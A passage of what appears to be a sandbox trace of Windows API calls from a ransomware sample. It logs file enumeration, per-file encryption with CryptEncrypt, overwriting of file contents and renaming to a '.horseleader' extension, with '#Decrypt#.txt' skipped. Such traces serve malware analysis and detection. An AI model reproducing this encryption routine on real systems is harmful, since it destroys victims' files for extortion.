(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.527] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.527] CloseHandle (hObject=0x158) returned 1 [0247.527] GetProcessHeap () returned 0x780000 [0247.527] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.527] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0247.527] lstrcmpiW (lpString1="PROFILE", lpString2="Windows") returned -1 [0247.527] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned 67 [0247.528] lstrcmpW (lpString1="PROFILE", lpString2=".") returned 1 [0247.528] lstrcmpW (lpString1="PROFILE", lpString2="..") returned 1 [0247.528] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.528] GetProcessHeap () returned 0x780000 [0247.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.528] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*") returned 69 [0247.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.529] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.529] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\.") returned 69 [0247.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.529] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.529] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\..") returned 70 [0247.529] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.529] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x53b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.529] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.530] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0247.530] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.530] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.530] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.530] lstrlenW (lpString=".testttjffg") returned 11 [0247.530] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.530] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.530] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.530] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.532] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 79 [0247.532] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.532] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1339) returned 1 [0247.532] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x53b, lpOverlapped=0x0) returned 1 [0247.534] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffac5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.534] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x53b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x53b, lpOverlapped=0x0) returned 1 [0247.535] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.535] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.535] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.535] CloseHandle (hObject=0x1a4) returned 1 [0247.535] GetProcessHeap () returned 0x780000 [0247.535] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.536] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.horseleader") returned 91 [0247.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.horseleader")) returned 1 [0247.537] GetProcessHeap () returned 0x780000 [0247.537] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.537] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a053d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1a053d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb20e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PROFILE.ELM", cAlternateFileName="")) returned 1 [0247.537] lstrcmpiW (lpString1="PROFILE.ELM", lpString2="Windows") returned -1 [0247.537] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0247.537] StrStrIW (lpFirst="PROFILE.ELM", lpSrch=".horseleader") returned 0x0 [0247.537] lstrcmpW (lpString1="PROFILE.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.537] lstrcmpW (lpString1="PROFILE.ELM", lpString2="_uninstalling_.png") returned 1 [0247.537] lstrlenW (lpString=".testttjffg") returned 11 [0247.537] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM", lpSrch=".testttjffg") returned 0x0 [0247.537] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.537] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.538] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.539] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM") returned 79 [0247.539] StrStrW (lpFirst="PROFILE.ELM", lpSrch=".txt") returned 0x0 [0247.539] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45582) returned 1 [0247.539] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.553] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.553] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.554] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.554] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.554] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x120e, lpOverlapped=0x0) returned 1 [0247.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffedf2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x120e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x120e, lpOverlapped=0x0) returned 1 [0247.555] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.555] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.555] CloseHandle (hObject=0x1a4) returned 1 [0247.556] GetProcessHeap () returned 0x780000 [0247.556] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.556] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM.horseleader") returned 91 [0247.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.elm.horseleader")) returned 1 [0247.559] GetProcessHeap () returned 0x780000 [0247.559] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.559] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PROFILE.INF", cAlternateFileName="")) returned 1 [0247.559] lstrcmpiW (lpString1="PROFILE.INF", lpString2="Windows") returned -1 [0247.559] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0247.559] StrStrIW (lpFirst="PROFILE.INF", lpSrch=".horseleader") returned 0x0 [0247.559] lstrcmpW (lpString1="PROFILE.INF", lpString2="#Decrypt#.txt") returned 1 [0247.559] lstrcmpW (lpString1="PROFILE.INF", lpString2="_uninstalling_.png") returned 1 [0247.559] lstrlenW (lpString=".testttjffg") returned 11 [0247.559] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF", lpSrch=".testttjffg") returned 0x0 [0247.559] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.559] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.560] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF") returned 79 [0247.560] StrStrW (lpFirst="PROFILE.INF", lpSrch=".txt") returned 0x0 [0247.560] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=587) returned 1 [0247.560] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x24b, lpOverlapped=0x0) returned 1 [0247.561] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x24b, lpOverlapped=0x0) returned 1 [0247.562] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.562] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.562] CloseHandle (hObject=0x1a4) returned 1 [0247.562] GetProcessHeap () returned 0x780000 [0247.562] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.563] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF.horseleader") returned 91 [0247.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PROFILE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\profile.inf.horseleader")) returned 1 [0247.564] GetProcessHeap () returned 0x780000 [0247.564] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.564] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4162, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.564] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.565] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0247.565] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.565] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.565] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.565] lstrlenW (lpString=".testttjffg") returned 11 [0247.565] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.565] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.565] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.565] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.566] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\THMBNAIL.PNG") returned 80 [0247.566] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.566] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=16738) returned 1 [0247.566] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4162, lpOverlapped=0x0) returned 1 [0247.571] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbe9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4162, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4162, lpOverlapped=0x0) returned 1 [0247.572] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.572] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.572] CloseHandle (hObject=0x1a4) returned 1 [0247.572] GetProcessHeap () returned 0x780000 [0247.572] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 